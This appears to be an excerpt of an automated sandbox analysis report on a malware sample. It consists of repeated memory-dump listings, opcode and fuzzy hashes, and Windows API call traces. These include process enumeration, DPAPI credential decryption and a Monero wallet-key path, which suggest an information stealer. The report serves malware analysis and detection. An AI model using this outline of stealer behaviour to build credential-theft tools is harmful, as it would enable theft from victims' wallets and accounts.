                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _;E$d1yg$dH:k$tuz$"oY
                              • API String ID: 0-1707974270
                              • Opcode ID: 32f3c0ad658d01fe933c764d03d438e94d0e4dfc16463bbefca9ccdb783f3396
                              • Instruction ID: ee14d366056b9885f01358298b2e4ceb50f5ca9a3803223341ba0155ea74ee58
                              • Opcode Fuzzy Hash: 32f3c0ad658d01fe933c764d03d438e94d0e4dfc16463bbefca9ccdb783f3396
                              • Instruction Fuzzy Hash: C18205F3A086049FE304AE2DEC8567AFBE5EF94320F16893DEAC4C7744E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .}$7L?}$fc{$r|
                              • API String ID: 0-94770799
                              • Opcode ID: c709065842e6e5b28bceaa604b03a546c335c7c958f7f7b2aedbfe82f9d8d9fa
                              • Instruction ID: 7e7d089eaf7552365fa94e72a4ea566c47acc69af4bc6a820f080c654e8310b7
                              • Opcode Fuzzy Hash: c709065842e6e5b28bceaa604b03a546c335c7c958f7f7b2aedbfe82f9d8d9fa
                              • Instruction Fuzzy Hash: 2292F8F3A0C2049FE3046E2DEC4566AFBE5EF94320F1A463DEAC4C7744E63599058697
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C005B7), ref: 00BF86CA
                              • Process32First.KERNEL32(?,00000128), ref: 00BF86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00BF86F3
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • CloseHandle.KERNEL32(?), ref: 00BF8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: cc2501a22999b132fa65c96ddb9d81220084a15873002b936d781036bde432a8
                              • Instruction ID: 2721d3a298d100a99d0000a4da1b83206b107a100b47dde2ceea4bfe1468114a
                              • Opcode Fuzzy Hash: cc2501a22999b132fa65c96ddb9d81220084a15873002b936d781036bde432a8
                              • Instruction Fuzzy Hash: D4310CB190111CABCB28EB55DC45FEEB7B8EB45740F1041E9A60DA71A0DB706E49CFA1
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00BE5184,40000001,00000000,00000000,?,00BE5184), ref: 00BF8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: ab96b1a896bc1c229a0ea465c865443646ad620fd6ae217a484148eab6177b98
                              • Instruction ID: 5fd4cd35aca43cc73379100f870ccbcdea65da1c3c28e93f10346724c7750be4
                              • Opcode Fuzzy Hash: ab96b1a896bc1c229a0ea465c865443646ad620fd6ae217a484148eab6177b98
                              • Instruction Fuzzy Hash: F4110670200208AFDB04CF65D889FBA33E9EF89700F149898FA198B250DB75E849DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: d7b65a546378e26a3dfa37bc385b536c3c570853736346738a176e62781cbd78
                              • Instruction ID: 989c557be274e30ac2bd16195bc1e7af170ffeaa5068a8ec830507a6297e896b
                              • Opcode Fuzzy Hash: d7b65a546378e26a3dfa37bc385b536c3c570853736346738a176e62781cbd78
                              • Instruction Fuzzy Hash: 4911A2B4240208BFEB14CF65DC95FAA77B5FB89700F208098FA159B390C7B6A945CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E00,00000000,?), ref: 00BF79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00C00E00,00000000,?), ref: 00BF79C4
                              • wsprintfA.USER32 ref: 00BF79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 4378355f7d3e3d925bbc8f06752b3ee17de16b20372c23707bea34214ee14aa3
                              • Instruction ID: 3dfb66e624fb23f63ca9ba9f91168ec7f524d74efa5c77ea0bdcb67a524a7650
                              • Opcode Fuzzy Hash: 4378355f7d3e3d925bbc8f06752b3ee17de16b20372c23707bea34214ee14aa3
                              • Instruction Fuzzy Hash: D3115AB2904118ABCB18DFCADD44BBEB7F8FB4CB11F04415AF601A2280E3785905CBB1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009BE958,00000000,?,00C00E10,00000000,?,00000000,00000000), ref: 00BF7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009BE958,00000000,?,00C00E10,00000000,?,00000000,00000000,?), ref: 00BF7A7D
                              • wsprintfA.USER32 ref: 00BF7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: c66cb8990f81e9b83b18de32e0db407e19638ad7d22a593fd06bc5a7753ef685
                              • Instruction ID: 5b9df395f362de523ca35460c00fce771d7badd61c446b9fbd81b316e4305c5d
                              • Opcode Fuzzy Hash: c66cb8990f81e9b83b18de32e0db407e19638ad7d22a593fd06bc5a7753ef685
                              • Instruction Fuzzy Hash: F71182B1A45218DFDB248F55DC49F69B7B8F704711F1043E6E606A32C0D7741A45CF51
                              APIs
                              • CoCreateInstance.COMBASE(00BFE118,00000000,00000001,00BFE108,00000000), ref: 00BF3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BF37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 01f7e185eff0629e22e6c7ad98710684aea245d0be3d3b08f8ec0a4d575c8ff6
                              • Instruction ID: e4cb25b5ba580074fcb567874a94cb80797386d645f41a3ff0a6d8ec69ce16c1
                              • Opcode Fuzzy Hash: 01f7e185eff0629e22e6c7ad98710684aea245d0be3d3b08f8ec0a4d575c8ff6
                              • Instruction Fuzzy Hash: FB41EA70A40A1C9FDB24DB58CC95BABB7B5BB48702F4041D8E618E72D0D771AE85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BE9BA3
                              • LocalFree.KERNEL32(?), ref: 00BE9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: f5030696b3cb2894c0bda8fea6914716f2b6686ed27c31f6020fec9a8f8a7d81
                              • Instruction ID: cc046648fa15534a1be66d75872e275d2b38c51f3cdec9c069b37387bfcfb009
                              • Opcode Fuzzy Hash: f5030696b3cb2894c0bda8fea6914716f2b6686ed27c31f6020fec9a8f8a7d81
                              • Instruction Fuzzy Hash: F3110CB4A00209DFCB04DFA5D985AAE77F5FF88300F1045A8E915A7350D774AE55CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -@mb$5=s
                              • API String ID: 0-1767529023
                              • Opcode ID: 40f3899e906cfa888120052236e9e72ee0b690b8f3c558dd72f9ab9374a7d8ab
                              • Instruction ID: 8b0501a665d8f5981ff901adc631358d0097d4a2ae907b76243c36c0cc03bd7e
                              • Opcode Fuzzy Hash: 40f3899e906cfa888120052236e9e72ee0b690b8f3c558dd72f9ab9374a7d8ab
                              • Instruction Fuzzy Hash: 1EB219F3A082149FE3046E2DEC8567AFBE5EF94720F1A4A3DEAC4C7744E63558018796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !;5z$4`:k$?,d7
                              • API String ID: 0-1857403863
                              • Opcode ID: b93410287c4bf30215a20dfdfd7e9270acc6593baf296fb1ce3720a1e47e1055
                              • Instruction ID: 5df12e503f1c5d335e7e86cc85a2d14fc9f80981dba052e416cea594dc9fb804
                              • Opcode Fuzzy Hash: b93410287c4bf30215a20dfdfd7e9270acc6593baf296fb1ce3720a1e47e1055
                              • Instruction Fuzzy Hash: 8C5126F3A082109FE7086E3CEC9977ABBD9EB54310F16493DEAC5C7784E97958048786
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: WT=t
                              • API String ID: 0-564892656
                              • Opcode ID: 82017a00d0c6c03e14b33780cf7103c113c6a808839a012a9604e1171aa607cf
                              • Instruction ID: 42a649aa419c63af79582a045d774df57e0ea5c014562ac5089d8a40f6d6b8c1
                              • Opcode Fuzzy Hash: 82017a00d0c6c03e14b33780cf7103c113c6a808839a012a9604e1171aa607cf
                              • Instruction Fuzzy Hash: E8B22AF3A0C2049FE304AE2DEC4567ABBE9EFD4720F1A853DEAC5C3744E63558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
